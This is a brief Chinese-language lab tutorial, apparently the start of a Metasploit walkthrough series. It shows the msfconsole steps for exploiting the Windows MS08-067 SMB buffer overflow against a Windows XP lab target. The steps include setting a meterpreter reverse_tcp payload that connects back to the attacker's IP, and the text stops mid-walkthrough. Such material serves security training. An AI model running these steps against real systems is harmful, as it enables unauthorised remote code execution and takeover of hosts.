MSF多种渗透测试实例合集
本文漏洞均为已发布漏洞,仅供学习实验,请自己搭建靶机进行学习。
1.(MS08-067)缓冲区溢出漏洞
漏洞简介:
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击.
实验坏境:
kali linux、windows XP sp3 中文版
Kali:192.168.1.10
Windows xp :192.168.1.100
利用过程详解:
msfconsole 进入msf
search MS08-067 查找带ms08-067的模块
use exploit/windows/smb/ms08_067_netapi 使用找到的该模块
show options 显示需要设置什么选项(如果required列为YES,表示该选项必须设置)
set payload windows/meterpreter/reverse_tcp 设置使用的payload,此处是渗透成功后从目标主机发起一个反弹连接
set rhost 192.168.1.100 设置目标主机IP
set lhost 192.168.1.10 设置攻击者的IP,也就是payload反弹后连接的IP。
<